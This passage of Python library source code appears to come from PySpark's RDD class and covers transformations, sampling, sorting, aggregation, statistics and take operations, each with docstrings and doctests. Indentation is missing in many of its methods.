    def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
        """
        Deprecated: use mapPartitionsWithIndex instead.

        Return a new RDD by applying a function to each partition of this RDD,
        while tracking the index of the original partition.

        >>> rdd = sc.parallelize([1, 2, 3, 4], 4)
        >>> def f(splitIndex, iterator): yield splitIndex
        >>> rdd.mapPartitionsWithSplit(f).sum()
        6
        """
        # Kept only for backwards compatibility; warn and delegate.
        warnings.warn("mapPartitionsWithSplit is deprecated; "
                      "use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
        return self.mapPartitionsWithIndex(f, preservesPartitioning)
    def getNumPartitions(self):
        """
        Returns the number of partitions in RDD

        >>> rdd = sc.parallelize([1, 2, 3, 4], 2)
        >>> rdd.getNumPartitions()
        2
        """
        return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return filter(fail_on_stopiteration(f), iterator)
return self.mapPartitions(func, True)
def distinct(self, numPartitions=None):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x, numPartitions) \
.map(lambda x: x[0])
    def sample(self, withReplacement, fraction, seed=None):
        """
        Return a sampled subset of this RDD.

        :param withReplacement: can elements be sampled multiple times (replaced when sampled out)
        :param fraction: expected size of the sample as a fraction of this RDD's size
            without replacement: probability that each element is chosen; fraction must be [0, 1]
            with replacement: expected number of times each element is chosen; fraction must be >= 0
        :param seed: seed for the random number generator

        .. note:: This is not guaranteed to provide exactly the fraction specified of the total
            count of the given :class:`DataFrame`.

        >>> rdd = sc.parallelize(range(100), 4)
        >>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14
        True
        """
        assert fraction >= 0.0, "Negative fraction value: %s" % fraction
        # RDDSampler implements the per-partition sampling logic; its func
        # receives (partition_index, iterator).
        return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(self, weights, seed=None):
"""
Randomly splits this RDD with the provided weights.
:param weights: weights for splits, will be normalized if they don't sum to 1
:param seed: random seed
:return: split RDDs in a list
>>> rdd = sc.parallelize(range(500), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> len(rdd1.collect() + rdd2.collect())
500
>>> 150 < rdd1.count() < 250
True
>>> 250 < rdd2.count() < 350
True
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])]
# this is ported from scala/spark/RDD.scala
    def takeSample(self, withReplacement, num, seed=None):
        """
        Return a fixed-size sampled subset of this RDD.

        .. note:: This method should only be used if the resulting array is expected
            to be small, as all the data is loaded into the driver's memory.

        >>> rdd = sc.parallelize(range(0, 10))
        >>> len(rdd.takeSample(True, 20, 1))
        20
        >>> len(rdd.takeSample(False, 5, 2))
        5
        >>> len(rdd.takeSample(False, 15, 3))
        10
        """
        numStDev = 10.0  # safety margin (in std deviations) for the max sample size
        if num < 0:
            raise ValueError("Sample size cannot be negative.")
        elif num == 0:
            return []
        initialCount = self.count()
        if initialCount == 0:
            return []
        rand = random.Random(seed)
        if (not withReplacement) and num >= initialCount:
            # Asking for at least the whole RDD without replacement:
            # shuffle current RDD and return
            samples = self.collect()
            rand.shuffle(samples)
            return samples
        maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize))
        if num > maxSampleSize:
            raise ValueError(
                "Sample size cannot be greater than %d." % maxSampleSize)
        # Oversample so that a single pass usually yields >= num elements.
        fraction = RDD._computeFractionForSampleSize(
            num, initialCount, withReplacement)
        samples = self.sample(withReplacement, fraction, seed).collect()
        # If the first sample didn't turn out large enough, keep trying to take samples;
        # this shouldn't happen often because we use a big multiplier for their initial size.
        # See: scala/spark/RDD.scala
        while len(samples) < num:
            # TODO: add log warning for when more than one iteration was run
            seed = rand.randint(0, sys.maxsize)
            samples = self.sample(withReplacement, fraction, seed).collect()
        rand.shuffle(samples)
        return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
if (self.partitioner == other.partitioner and
self.getNumPartitions() == rdd.getNumPartitions()):
rdd.partitioner = self.partitioner
return rdd
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
.. note:: This method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda k_vs: all(k_vs[1])) \
.keys()
    def _reserialize(self, serializer=None):
        # Return an RDD whose data is encoded with `serializer` (defaults to
        # the context's serializer); a no-op when it already matches.
        serializer = serializer or self.ctx.serializer
        if self._jrdd_deserializer != serializer:
            # Rebind `self` to an identity-mapped copy and tag it with the
            # requested serializer; the original RDD is left untouched.
            self = self.map(lambda x: x, preservesPartitioning=True)
            self._jrdd_deserializer = serializer
        return self
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash,
ascending=True, keyfunc=lambda x: x):
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
>>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, True)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
    def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
        """
        Sorts this RDD, which is assumed to consist of (key, value) pairs.

        >>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
        >>> sc.parallelize(tmp).sortByKey().first()
        ('1', 3)
        >>> sc.parallelize(tmp).sortByKey(True, 1).collect()
        [('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
        >>> sc.parallelize(tmp).sortByKey(True, 2).collect()
        [('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
        >>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
        >>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
        >>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
        [('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
        """
        if numPartitions is None:
            numPartitions = self._defaultReducePartitions()
        memory = self._memory_limit()
        serializer = self._jrdd_deserializer

        def sortPartition(iterator):
            # Spill-to-disk sort; 0.9 leaves headroom under the memory limit.
            sort = ExternalSorter(memory * 0.9, serializer).sorted
            return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending)))

        if numPartitions == 1:
            # Single output partition: collapse and sort locally, no ranges needed.
            if self.getNumPartitions() > 1:
                self = self.coalesce(1)
            return self.mapPartitions(sortPartition, True)

        # first compute the boundary of each part via sampling: we want to partition
        # the key-space into bins such that the bins have roughly the same
        # number of (key, value) pairs falling into them
        rddSize = self.count()
        if not rddSize:
            return self  # empty RDD
        maxSampleSize = numPartitions * 20.0  # constant from Spark's RangePartitioner
        fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
        samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect()
        samples = sorted(samples, key=keyfunc)

        # we have numPartitions many parts but one of the them has
        # an implicit boundary
        bounds = [samples[int(len(samples) * (i + 1) / numPartitions)]
                  for i in range(0, numPartitions - 1)]

        def rangePartitioner(k):
            # Binary-search the sampled boundaries to pick a partition.
            p = bisect.bisect_left(bounds, keyfunc(k))
            if ascending:
                return p
            else:
                return numPartitions - 1 - p

        return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
    def cartesian(self, other):
        """
        Return the Cartesian product of this RDD and another one, that is, the
        RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
        C{b} is in C{other}.

        >>> rdd = sc.parallelize([1, 2])
        >>> sorted(rdd.cartesian(rdd).collect())
        [(1, 1), (1, 2), (2, 1), (2, 2)]
        """
        # Due to batching, we can't use the Java cartesian method.
        # Pair the two sides' serializers so each half of the product is
        # decoded with the serializer it was written with.
        deserializer = CartesianDeserializer(self._jrdd_deserializer,
                                             other._jrdd_deserializer)
        return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None, partitionFunc=portable_hash):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions, partitionFunc)
    @ignore_unicode_prefix
    def pipe(self, command, env=None, checkCode=False):
        """
        Return an RDD created by piping elements to a forked external process.

        >>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
        [u'1', u'2', u'', u'3']

        :param checkCode: whether or not to check the return value of the shell command.
        """
        if env is None:
            env = dict()

        def func(iterator):
            # One external process per partition; its stdin is fed from a
            # separate thread so stdout can be consumed concurrently.
            pipe = Popen(
                shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)

            def pipe_objs(out):
                for obj in iterator:
                    s = unicode(obj).rstrip('\n') + '\n'
                    out.write(s.encode('utf-8'))
                out.close()
            Thread(target=pipe_objs, args=[pipe.stdin]).start()

            def check_return_code():
                # Empty generator chained after stdout: it only runs once
                # stdout is exhausted, at which point the exit code is checked.
                pipe.wait()
                if checkCode and pipe.returncode:
                    raise Exception("Pipe function `%s' exited "
                                    "with error code %d" % (command, pipe.returncode))
                else:
                    for i in range(0):
                        yield i
            return (x.rstrip(b'\n').decode('utf-8') for x in
                    chain(iter(pipe.stdout.readline, b''), check_return_code()))
        return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
f = fail_on_stopiteration(f)
def processPartition(iterator):
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it):
r = f(it)
try:
return iter(r)
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
    def collect(self):
        """
        Return a list that contains all of the elements in this RDD.

        .. note:: This method should only be used if the resulting array is expected
            to be small, as all the data is loaded into the driver's memory.
        """
        with SCCallSiteSync(self.context) as css:
            # Run the job on the JVM; results are served back to the driver
            # over a local socket and deserialized here.
            sock_info = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
        return list(_load_from_socket(sock_info, self._jrdd_deserializer))
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
f = fail_on_stopiteration(f)
def func(iterator):
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self, f, depth=2):
"""
Reduces the elements of this RDD in a multi-level tree pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
zeroValue = None, True # Use the second entry to indicate whether this is a dummy value.
def op(x, y):
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
This behaves somewhat differently from fold operations implemented
for non-distributed collections in functional languages like Scala.
This fold operation may be applied to partitions individually, and then
fold those results into the final result, rather than apply the fold
to each element sequentially in some defined ordering. For functions
that are not commutative, the result may differ from that of a fold
applied to a non-distributed collection.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
op = fail_on_stopiteration(op)
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The functions C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
an U and one operation for merging two U
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
seqOp = fail_on_stopiteration(seqOp)
combOp = fail_on_stopiteration(combOp)
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(combOp, vals, zeroValue)
    def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
        """
        Aggregates the elements of this RDD in a multi-level tree
        pattern.

        :param depth: suggested depth of the tree (default: 2)

        >>> add = lambda x, y: x + y
        >>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
        >>> rdd.treeAggregate(0, add, add)
        -5
        >>> rdd.treeAggregate(0, add, add, 1)
        -5
        >>> rdd.treeAggregate(0, add, add, 2)
        -5
        >>> rdd.treeAggregate(0, add, add, 5)
        -5
        >>> rdd.treeAggregate(0, add, add, 10)
        -5
        """
        if depth < 1:
            raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)

        if self.getNumPartitions() == 0:
            return zeroValue

        def aggregatePartition(iterator):
            # Fold each partition with seqOp, starting from zeroValue.
            acc = zeroValue
            for obj in iterator:
                acc = seqOp(acc, obj)
            yield acc

        partiallyAggregated = self.mapPartitions(aggregatePartition)
        numPartitions = partiallyAggregated.getNumPartitions()
        # Branching factor: roughly the depth-th root of the partition count,
        # but at least 2 so the loop below makes progress.
        scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
        # If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
        # aggregation.
        while numPartitions > scale + numPartitions / scale:
            numPartitions /= scale
            curNumPartitions = int(numPartitions)

            def mapPartition(i, iterator):
                # Fan partial results into fewer partitions for the next level.
                for obj in iterator:
                    yield (i % curNumPartitions, obj)

            partiallyAggregated = partiallyAggregated \
                .mapPartitionsWithIndex(mapPartition) \
                .reduceByKey(combOp, curNumPartitions) \
                .values()

        return partiallyAggregated.reduce(combOp)
def max(self, key=None):
"""
Find the maximum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max)
return self.reduce(lambda a, b: max(a, b, key=key))
def min(self, key=None):
"""
Find the minimum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min)
return self.reduce(lambda a, b: min(a, b, key=key))
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).fold(0, operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
    def histogram(self, buckets):
        """
        Compute a histogram using the provided buckets. The buckets
        are all open to the right except for the last which is closed.
        e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
        which means 1<=x<10, 10<=x<20, 20<=x<=50. And on the input of 1
        and 50 we would have a histogram of 1,0,1.
        If your histogram is evenly spaced (e.g. [0, 10, 20, 30]),
        this can be switched from an O(log n) insertion to O(1) per
        element (where n is the number of buckets).
        Buckets must be sorted, not contain any duplicates, and have
        at least two elements.
        If `buckets` is a number, it will generate buckets which are
        evenly spaced between the minimum and maximum of the RDD. For
        example, if the min value is 0 and the max is 100, given `buckets`
        as 2, the resulting buckets will be [0,50) [50,100]. `buckets` must
        be at least 1. An exception is raised if the RDD contains infinity.
        If the elements in the RDD do not vary (max == min), a single bucket
        will be used.
        The return value is a tuple of buckets and histogram.
        >>> rdd = sc.parallelize(range(51))
        >>> rdd.histogram(2)
        ([0, 25, 50], [25, 26])
        >>> rdd.histogram([0, 5, 25, 50])
        ([0, 5, 25, 50], [5, 20, 26])
        >>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
        ([0, 15, 30, 45, 60], [15, 15, 15, 6])
        >>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
        >>> rdd.histogram(("a", "b", "c"))
        (('a', 'b', 'c'), [2, 2])
        """
        if isinstance(buckets, int):
            # Caller asked for N evenly spaced buckets: compute min/max of
            # the RDD, then synthesize the bucket boundaries.
            if buckets < 1:
                raise ValueError("number of buckets must be >= 1")
            # filter out non-comparable elements
            def comparable(x):
                if x is None:
                    return False
                if type(x) is float and isnan(x):
                    return False
                return True
            filtered = self.filter(comparable)
            # faster than stats()
            def minmax(a, b):
                return min(a[0], b[0]), max(a[1], b[1])
            try:
                minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
            except TypeError as e:
                # reduce() on an empty RDD raises a TypeError mentioning
                # "empty"; re-surface that case with a clearer message.
                if " empty " in str(e):
                    raise ValueError("can not generate buckets from empty RDD")
                raise
            if minv == maxv or buckets == 1:
                # Degenerate data (all equal) or a single bucket: one bin
                # spanning [minv, maxv] covers everything.
                return [minv, maxv], [filtered.count()]
            try:
                inc = (maxv - minv) / buckets
            except TypeError:
                raise TypeError("Can not generate buckets with non-number in RDD")
            if isinf(inc):
                raise ValueError("Can not generate buckets with infinite value")
            # keep them as integer if possible
            inc = int(inc)
            if inc * buckets != maxv - minv:
                # Integer step doesn't divide the range exactly; fall back
                # to a float step.
                inc = (maxv - minv) * 1.0 / buckets
            buckets = [i * inc + minv for i in range(buckets)]
            buckets.append(maxv)  # fix accumulated error
            even = True
        elif isinstance(buckets, (list, tuple)):
            # Caller supplied explicit boundaries: validate them.
            if len(buckets) < 2:
                raise ValueError("buckets should have more than one value")
            if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
                raise ValueError("can not have None or NaN in buckets")
            if sorted(buckets) != list(buckets):
                raise ValueError("buckets should be sorted")
            if len(set(buckets)) != len(buckets):
                raise ValueError("buckets should not contain duplicated values")
            minv = buckets[0]
            maxv = buckets[-1]
            even = False
            inc = None
            try:
                steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
            except TypeError:
                pass  # objects in buckets do not support '-'
            else:
                # If all steps are (numerically) equal, use the O(1)
                # arithmetic bucket lookup instead of bisect.
                if max(steps) - min(steps) < 1e-10:  # handle precision errors
                    even = True
                    inc = (maxv - minv) / (len(buckets) - 1)
        else:
            raise TypeError("buckets should be a list or tuple or number(int or long)")
        def histogram(iterator):
            # Per-partition counting. len(buckets) boundaries produce
            # len(buckets)-1 bins; the extra slot absorbs i == maxv.
            counters = [0] * len(buckets)
            for i in iterator:
                # Skip None/NaN and anything outside [minv, maxv].
                if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
                    continue
                t = (int((i - minv) / inc) if even
                     else bisect.bisect_right(buckets, i) - 1)
                counters[t] += 1
            # add last two together
            last = counters.pop()
            counters[-1] += last
            return [counters]
        def mergeCounters(a, b):
            return [i + j for i, j in zip(a, b)]
        return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num, key=None):
"""
Get the top N elements from an RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
.. note:: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator):
yield heapq.nlargest(num, iterator, key=key)
def merge(a, b):
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
def takeOrdered(self, num, key=None):
"""
Get the N elements from an RDD ordered in ascending order or as
specified by the optional key function.
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a, b):
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self, num):
"""
Take the first num elements of the RDD.
It works by first scanning one partition, and use the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self.getNumPartitions()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
# the first paramter of max is >=1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
left = num - len(items)
def takeUpToNumLeft(iterator):
iterator = iter(iterator)
taken = 0
while taken < left:
yield next(iterator)
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p)
items += res
partsScanned += numPartsToTry
return items[:num]
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self):
"""
Returns true if and only if the RDD contains no elements at all.
.. note:: an RDD may be empty even when it has at least 1 partition.
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self.getNumPartitions() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
